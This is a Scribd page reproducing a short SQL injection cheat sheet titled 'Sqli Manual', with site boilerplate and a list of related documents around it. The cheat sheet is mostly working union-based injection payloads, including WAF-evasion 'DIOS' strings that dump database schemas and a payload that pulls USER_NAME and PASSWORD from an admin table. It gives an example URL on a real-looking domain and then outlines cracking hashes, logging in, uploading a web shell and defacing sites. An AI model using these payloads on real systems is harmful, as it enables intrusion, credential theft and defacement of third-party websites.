Welcome to Scribd!

Sqli Manual

Uploaded by

0% found this document useful (0 votes)

51 views2 pages

The document provides instructions for SQL injection vulnerabilities including checking for errors, exploiting vulnerable tables, and different payloads to retrieve usernames and passwords from an admin table. Examples show adding a payload to the end of a URL to extract this sensitive information.

Original Description:

Sqli chall database

Copyright

Available Formats

TXT, PDF, TXT or read online from Scribd

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Report this Document

Copyright:

Available Formats

Download as TXT, PDF, TXT or read online from Scribd

Flag for inappropriate content

0% found this document useful (0 votes)

51 views2 pages

Sqli Manual

Uploaded by

Hanif Ahmad Syauqi

Copyright:

Available Formats

Download as TXT, PDF, TXT or read online from Scribd

Flag for inappropriate content

Jump to Page

You are on page 1of 2

Search inside document

Vuln checker : %27 or ' at the end of url, if(syntax sql error>>vuln)

Keep going until error :+order+by+10--+-

Check for vuln tables :

-(php digit)+union+select+1,2,3,4,5,6,7,8,9,10--+-

Add exploit on the vuln number

=-(php digit)+union+select+1,EXPLOIT,3,4,5--+-

Exploit :

MadBlood DIOS :

(Select+export_set(5,@:=0,
(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@
,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

ZEN with WAF DIOS:

(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/
(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/
())and(@)in(@:=CoNCat
%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)

other exploit :

make_set(6,@:=0x0a,
(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_n
ame,column_name)),@)

Look up :

Add :

-(php digit)+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,
(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--

Example :

www.situs.co.il/advertiser_view.php?id=-
77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,
(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Hash password>>search for admin panel>>login>>upload shell>>and then what ever you
want...

Changing for index???, don't forget to backup, except israel website

Compile by MRHZ
===========================
tbl_admin_login_t :admin_name
tbl_admin_login_t :user_name
tbl_admin_login_t :user_password

make_set(6,@:=0x0a,
(select(1)from(tbl_admin_login_t)where@:=make_set(511,@,0x3c6c693e,admin_name,user_
name,user_password)),@)

Trivium Source Code
Document4 pages
Trivium Source Code
Kevin Dion
No ratings yet
Some Tutorials in Computer Networking Hacking
From Everand
Some Tutorials in Computer Networking Hacking
Dr. Hidaia Mahmood Alassouli
No ratings yet
Himank
Document24 pages
Himank
cheenujoshi2007
No ratings yet
Lista Cod Virus
Document90 pages
Lista Cod Virus
Cezar Augusto
No ratings yet
SQL Injection Guidelines
Document7 pages
SQL Injection Guidelines
Duane Adam
No ratings yet
SQL - PHP: Tutorial
Document27 pages
SQL - PHP: Tutorial
Faiz Syed Mohammed
No ratings yet
C++ Certified Professional Programmer: C++ Institute CPP Dumps Available Here at
Document9 pages
C++ Certified Professional Programmer: C++ Institute CPP Dumps Available Here at
Christina Fington
No ratings yet
8
Document2 pages
8
PRATHAMESH GAYAKE
No ratings yet
Aj Lab Programs
Document26 pages
Aj Lab Programs
kiruthika
No ratings yet
Class 12th Practical File
Document18 pages
Class 12th Practical File
Animesh Sir
No ratings yet
CS2308 System Software Lab VECCSE2
Document45 pages
CS2308 System Software Lab VECCSE2
Prema Selvam
No ratings yet
Java Practical Roll No 261
Document7 pages
Java Practical Roll No 261
Richardjames
No ratings yet
Lecture1 CHE210 2020
Document3 pages
Lecture1 CHE210 2020
shodmon
No ratings yet
Pycharm Source Code:: Output
Document30 pages
Pycharm Source Code:: Output
sololife
No ratings yet
Chapter 4
Document31 pages
Chapter 4
Shish Datta
No ratings yet
Working With PHP and Oracle ADH 401T TUTORIALS
Document16 pages
Working With PHP and Oracle ADH 401T TUTORIALS
DLamola
No ratings yet
Chose 3 Total Each 1 From
Document14 pages
Chose 3 Total Each 1 From
AB GAMERZ
No ratings yet
(SOAL 1) : Nama Tim
Document12 pages
(SOAL 1) : Nama Tim
broken heartz
No ratings yet
Practical PHP Security - Paper
Document25 pages
Practical PHP Security - Paper
Marco Antonio Wilmot
No ratings yet
Eva1 2 Alter
Document6 pages
Eva1 2 Alter
Andres Tavares Tena 6.-Q
No ratings yet
SQL Injection Tutorial by SlixMe
Document6 pages
SQL Injection Tutorial by SlixMe
anon_440252992
No ratings yet
Unit 2: Expressions and Variables For Loops
Document15 pages
Unit 2: Expressions and Variables For Loops
Jacky Wong Kin Woon
No ratings yet
02 Expressions Variables Forloops
Document15 pages
02 Expressions Variables Forloops
sdvsd sdvineo
No ratings yet
Question No 02:: Select The Best Answer
Document8 pages
Question No 02:: Select The Best Answer
Shoaib Kareem
No ratings yet
ChronoForms Excel Export Extras
Document8 pages
ChronoForms Excel Export Extras
WEBMIDIA
No ratings yet
Confluence 2022
Document3 pages
Confluence 2022
scribdfoo1
No ratings yet
Excel C#
Document39 pages
Excel C#
Bhuvnesh Pandey
No ratings yet
20191ise0008 - Akshay - DBMS Lab Obs
Document52 pages
20191ise0008 - Akshay - DBMS Lab Obs
Akshay Harish
No ratings yet
Dbms Lab: Experiment-1
Document32 pages
Dbms Lab: Experiment-1
Akshay Harish
No ratings yet
How To Install
Document426 pages
How To Install
Boris ANDRIĆ
No ratings yet
DIR
Document12 pages
DIR
bhslegion1498
No ratings yet
Computer Applications Practice Paper ICSE 10th
Document17 pages
Computer Applications Practice Paper ICSE 10th
Vignesh Natarajan
100% (1)
C# and VB - Net Comparison
Document16 pages
C# and VB - Net Comparison
boyiniramana
No ratings yet
Test 1
Document5 pages
Test 1
OMKAR JOSHI
No ratings yet
Strace System Call Tracing With strace-NDC-TechTown-Kerrisk
Document28 pages
Strace System Call Tracing With strace-NDC-TechTown-Kerrisk
Anonymous gqSpNAmlW
No ratings yet
Section 1: Short Answer Questions
Document6 pages
Section 1: Short Answer Questions
qwerty asdfgh
No ratings yet
Java and C# Comparison
Document6 pages
Java and C# Comparison
prashant_p2b
No ratings yet
Java Basics Batch30
Document16 pages
Java Basics Batch30
manikanta tarun
No ratings yet
Class 12 Computer Science-Updated
Document19 pages
Class 12 Computer Science-Updated
aadi marwah
No ratings yet
mcq-4,5,6 Java Dry-Run Programs Answers
Document2 pages
mcq-4,5,6 Java Dry-Run Programs Answers
anshi
No ratings yet
MYSQL
Document5 pages
MYSQL
RAZIQ YOUSSEF
No ratings yet
From Web
Document34 pages
From Web
yeyintnaing85
No ratings yet
Create A Database in MySQL
Document8 pages
Create A Database in MySQL
Laily Ishak
No ratings yet
FTP Request
Document6 pages
FTP Request
vhfyhfbcbtyf
No ratings yet
Consultas Mysql
Document3 pages
Consultas Mysql
Arael Gonzalez
No ratings yet
Audio Library Vulnerability Analysis
Document8 pages
Audio Library Vulnerability Analysis
Rayendra Rigin
No ratings yet
Audio Library Vulnerability Analysis
Document8 pages
Audio Library Vulnerability Analysis
Rayendra Rigin
No ratings yet
Positve or Negitive Skewed
Document5 pages
Positve or Negitive Skewed
chirusagar
No ratings yet
SP Blitz
Document227 pages
SP Blitz
Miguel
No ratings yet
CN Lab Manual
Document109 pages
CN Lab Manual
tixat43536
No ratings yet
Turbo C ListBox
Document9 pages
Turbo C ListBox
Carlos Villamizar
No ratings yet
Directory Related
Document6 pages
Directory Related
vee vee
No ratings yet
p68 0x06 Android Kernel Rootkit by Dong-Hoon You
Document18 pages
p68 0x06 Android Kernel Rootkit by Dong-Hoon You
Atul Tripathi
No ratings yet
Troubleshooting Workflow Notification Mailer Issues
Document6 pages
Troubleshooting Workflow Notification Mailer Issues
armughal70
No ratings yet
Experiment No. 09 (DC)
Document4 pages
Experiment No. 09 (DC)
anooja wade
No ratings yet
PART8-SAP TO Internet Communications
Document13 pages
PART8-SAP TO Internet Communications
api-3746151
No ratings yet
Class Running Notes 25th May
Document7 pages
Class Running Notes 25th May
nilesh kumar
No ratings yet
Sap
Document17 pages
Sap
李德军
No ratings yet
Practica Mysql
Document4 pages
Practica Mysql
Carlos Eduardo Ayil
No ratings yet
Computer Engineering Laboratory Solution Primer
From Everand
Computer Engineering Laboratory Solution Primer
Karan Bhandari
No ratings yet